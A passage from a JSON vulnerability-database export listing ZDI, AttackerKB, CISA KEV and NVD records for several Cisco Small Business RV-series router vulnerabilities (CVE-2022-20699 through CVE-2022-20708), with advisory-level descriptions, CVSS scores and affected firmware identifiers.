"cvelist": ["CVE-2022-20708"], "modified": "2022-02-22T00:00:00", "id": "ZDI-22-417", "href": "https://www.zerodayinitiative.com/advisories/ZDI-22-417/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-23T18:44:20", "description": "This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Cisco RV340 routers. Authentication is not required to exploit this vulnerability. 
The specific flaw exists within the handling of firmware updates. The issue results from the lack of proper validation of a firmware image when performing an upgrade. An attacker can leverage this vulnerability to execute code in the context of root.", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.4, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-22T00:00:00", "type": "zdi", "title": "(Pwn2Own) Cisco RV340 Firmware Update Missing Integrity Check Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20703"], "modified": "2022-02-22T00:00:00", "id": "ZDI-22-408", "href": "https://www.zerodayinitiative.com/advisories/ZDI-22-408/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-24T00:54:16", "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Cisco RV340 routers. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within confd_cli. 
The issue results from executing user commands at an unnecessarily high privilege level. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of root.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-22T00:00:00", "type": "zdi", "title": "(Pwn2Own) Cisco RV340 confd_cli Unnecessary Privileges Local Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20701"], "modified": "2022-02-22T00:00:00", "id": "ZDI-22-412", "href": "https://www.zerodayinitiative.com/advisories/ZDI-22-412/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-23T18:44:17", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco RV340 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the SSL VPN service, which listens on TCP port 8443 by default. 
The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-22T00:00:00", "type": "zdi", "title": "(Pwn2Own) Cisco RV340 SSLVPN Stack-based Buffer Overflow Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20699"], "modified": "2022-02-22T00:00:00", "id": "ZDI-22-414", "href": "https://www.zerodayinitiative.com/advisories/ZDI-22-414/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-23T18:44:17", "description": "This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Cisco RV340 routers. User interaction is required to exploit this vulnerability in that an administrator must perform a firmware update on the device. The specific flaw exists within the downloading of firmware files via HTTPS. 
The issue results from the lack of proper validation of the certificate presented by the server. An attacker can leverage this vulnerability to execute code in the context of root.", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.4, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-22T00:00:00", "type": "zdi", "title": "(Pwn2Own) Cisco RV340 Firmware Update Improper Certificate Validation Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20703", "CVE-2022-20704"], "modified": "2022-02-22T00:00:00", "id": "ZDI-22-413", "href": "https://www.zerodayinitiative.com/advisories/ZDI-22-413/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2022-12-01T08:08:06", "description": "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details 
section of this advisory.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-03T00:00:00", "type": "attackerkb", "title": "CVE-2022-20708", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20708"], "modified": "2022-02-10T00:00:00", "id": "AKB:A4434B3A-9194-4BD6-A1B1-77463B7E3875", "href": "https://attackerkb.com/topics/Dr7bj8jAsv/cve-2022-20708", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-19T17:14:35", "description": "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 
0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.4, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-03T00:00:00", "type": "attackerkb", "title": "CVE-2022-20703", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20703"], "modified": "2022-02-10T00:00:00", "id": "AKB:C141ACE4-A8F1-4772-B648-6B3AA5B46B43", "href": "https://attackerkb.com/topics/Sy2RG2Z20A/cve-2022-20703", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-05T08:13:44", "description": "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": 
"HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-03T00:00:00", "type": "attackerkb", "title": "CVE-2022-20701", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20701"], "modified": "2022-02-10T00:00:00", "id": "AKB:CE938B08-8EB0-4D1D-AA82-632EA9010ECF", "href": "https://attackerkb.com/topics/YlXn6VICn7/cve-2022-20701", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-21T05:13:54", "description": "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", 
"integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-03T00:00:00", "type": "attackerkb", "title": "CVE-2022-20700", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20700"], "modified": "2022-02-10T00:00:00", "id": "AKB:EF34D3A0-4FF6-4B40-9AAB-8759959DE40F", "href": "https://attackerkb.com/topics/LHUuFBwy51/cve-2022-20700", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-08T15:41:39", "description": "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.\n\n \n**Recent assessments:** \n \n**Yassineaboukir** at February 05, 2022 6:01pm UTC reported:\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": 
"NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-03T00:00:00", "type": "attackerkb", "title": "CVE-2022-20699", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20699"], "modified": "2022-02-10T00:00:00", "id": "AKB:CBF7C2C4-17B9-46E9-ADE8-64190C6E9F7D", "href": "https://attackerkb.com/topics/KEaCoCGQkx/cve-2022-20699", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "A vulnerability in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code elevate privileges, execute arbitrary commands, bypass authentication and authorization protections, fetch and run unsigned software, or cause a denial of service (DoS).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-03T00:00:00", "type": "cisa_kev", "title": "Cisco Small Business RV Series Routers Stack-based Buffer Overflow Vulnerability", 
"bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20708"], "modified": "2022-03-03T00:00:00", "id": "CISA-KEV-CVE-2022-20708", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T17:26:47", "description": "A vulnerability in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code elevate privileges, execute arbitrary commands, bypass authentication and authorization protections, fetch and run unsigned software, or cause a denial of service (DoS).", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.4, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-03T00:00:00", "type": "cisa_kev", "title": "Cisco Small Business RV Series Routers Stack-based Buffer Overflow Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, 
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20703"], "modified": "2022-03-03T00:00:00", "id": "CISA-KEV-CVE-2022-20703", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T17:26:47", "description": "A vulnerability in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code elevate privileges, execute arbitrary commands, bypass authentication and authorization protections, fetch and run unsigned software, or cause a denial of service (DoS).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-03T00:00:00", "type": "cisa_kev", "title": "Cisco Small Business RV Series Routers Stack-based Buffer Overflow Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20701"], "modified": "2022-03-03T00:00:00", "id": "CISA-KEV-CVE-2022-20701", "href": "", "cvss": {"score": 7.2, "vector": 
"AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T17:26:47", "description": "A vulnerability in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code elevate privileges, execute arbitrary commands, bypass authentication and authorization protections, fetch and run unsigned software, or cause a denial of service (DoS).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-03T00:00:00", "type": "cisa_kev", "title": "Cisco Small Business RV Series Routers Stack-based Buffer Overflow Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20700"], "modified": "2022-03-03T00:00:00", "id": "CISA-KEV-CVE-2022-20700", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T17:26:47", "description": "A vulnerability in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code elevate privileges, execute arbitrary commands, bypass authentication and authorization 
protections, fetch and run unsigned software, or cause a denial of service (DoS).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-03T00:00:00", "type": "cisa_kev", "title": "Cisco Small Business RV Series Routers Stack-based Buffer Overflow Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20699"], "modified": "2022-03-03T00:00:00", "id": "CISA-KEV-CVE-2022-20699", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-02-09T14:04:52", "description": "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": 
"UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-10T18:15:00", "type": "cve", "title": "CVE-2022-20708", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20708"], "modified": "2022-03-29T16:08:00", "cpe": ["cpe:/o:cisco:rv340_firmware:1.0.03.24", "cpe:/o:cisco:rv345_firmware:1.0.03.24", "cpe:/o:cisco:rv345p_firmware:1.0.03.24", "cpe:/o:cisco:rv340w_firmware:1.0.03.24"], "id": "CVE-2022-20708", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-20708", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv340_firmware:1.0.03.24:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv345p_firmware:1.0.03.24:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv340w_firmware:1.0.03.24:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv345_firmware:1.0.03.24:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:04:51", "description": "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the 
Details section of this advisory.", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.4, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-10T18:15:00", "type": "cve", "title": "CVE-2022-20703", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20703"], "modified": "2022-03-29T16:06:00", "cpe": ["cpe:/o:cisco:rv345_firmware:1.0.03.24", "cpe:/o:cisco:rv160w_firmware:1.0.01.05", "cpe:/o:cisco:rv160_firmware:1.0.01.05", "cpe:/o:cisco:rv260p_firmware:1.0.01.05", "cpe:/o:cisco:rv340_firmware:1.0.03.24", "cpe:/o:cisco:rv260w_firmware:1.0.01.05", "cpe:/o:cisco:rv340w_firmware:1.0.03.24", "cpe:/o:cisco:rv345p_firmware:1.0.03.24", "cpe:/o:cisco:rv260_firmware:1.0.01.05"], "id": "CVE-2022-20703", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-20703", "cvss": {"score": 7.2, "vector": 